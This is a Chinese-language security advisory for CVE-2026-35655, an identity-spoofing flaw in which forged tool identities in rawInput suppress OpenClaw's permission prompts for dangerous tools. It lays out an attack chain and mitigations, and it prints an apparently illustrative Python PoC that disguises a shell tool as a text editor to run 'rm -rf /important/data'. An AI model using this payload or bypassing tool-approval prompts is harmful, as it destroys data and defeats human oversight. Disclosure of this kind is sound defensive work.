CVE-2026-35655 CVSS 5.7 中危

CVE-2026-35655 OpenClaw身份欺骗漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35655

漏洞类型

身份欺骗

CVSS评分

5.7 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22之前的版本在ACP权限解析机制中存在身份欺骗漏洞。由于系统信任来自rawInput和metadata的冲突工具身份提示，低权限攻击者可通过构造恶意的rawInput参数来伪造工具身份。该漏洞允许攻击者抑制危险工具的提示，从而绕过安全限制，对系统完整性造成严重影响。

技术细节

该漏洞源于OpenClaw在处理ACP（访问控制面板）权限解析时的逻辑缺陷。当系统处理工具调用请求时，会同时检查rawInput（原始输入）和metadata（元数据）中的身份标识。然而，在存在冲突的情况下，系统错误地信任了来自用户可控的rawInput参数中的工具身份提示。攻击者利用此漏洞，可以在请求中伪造一个被认为是“安全”的工具身份，从而欺骗权限解析器。这导致系统在执行操作时跳过对潜在危险工具的安全提示和权限校验。由于CVSS向量显示需要用户交互（UI:R），攻击者可能需要诱导受害者执行特定操作，或者该交互是指工具执行过程中的确认步骤。最终，攻击者可以利用该漏洞绕过原本旨在限制敏感操作的安全机制，实现对系统的未授权操作或完整性破坏。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标使用的是OpenClaw 2026.3.22之前的版本，并确认其拥有低权限账户。

STEP 2

2. 构造Payload

攻击者构造包含恶意rawInput参数的HTTP请求，在rawInput中将危险工具的身份伪造为安全工具。

STEP 3

3. 发送请求

攻击者向OpenClaw的ACP权限解析接口发送上述恶意请求，触发漏洞。

STEP 4

4. 欺骗绕过

系统解析权限时信任了rawInput中的伪造身份，抑制了危险工具的提示，放行了请求。

STEP 5

5. 执行攻击

危险工具在未经适当安全检查的情况下被执行，导致系统完整性受损或敏感数据被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-35655: OpenClaw Identity Spoofing
# This script demonstrates how an attacker might bypass ACP permission checks
# by spoofing the tool identity in the rawInput parameter.

target_url = "http://vulnerable-openclaw-instance/api/acp/execute"
headers = {"Content-Type": "application/json", "Authorization": "Bearer <low_priv_token>"}

# The goal is to execute a dangerous tool (e.g., 'system_shell')
# by disguising it as a safe tool (e.g., 'text_editor') in rawInput.
payload = {
    "metadata": {
        "requested_tool": "system_shell"
    },
    "rawInput": {
        "tool_identity": "text_editor",  # Spoofed identity to bypass prompts
        "command_args": {
            "cmd": "rm -rf /important/data"
        }
    }
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Dangerous tool executed without prompt.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

如果无法立即升级，建议管理员暂时禁用受影响的功能或限制对ACP接口的网络访问。同时，应加强对系统日志的审计，监控包含异常rawInput参数的请求，以检测可能的攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表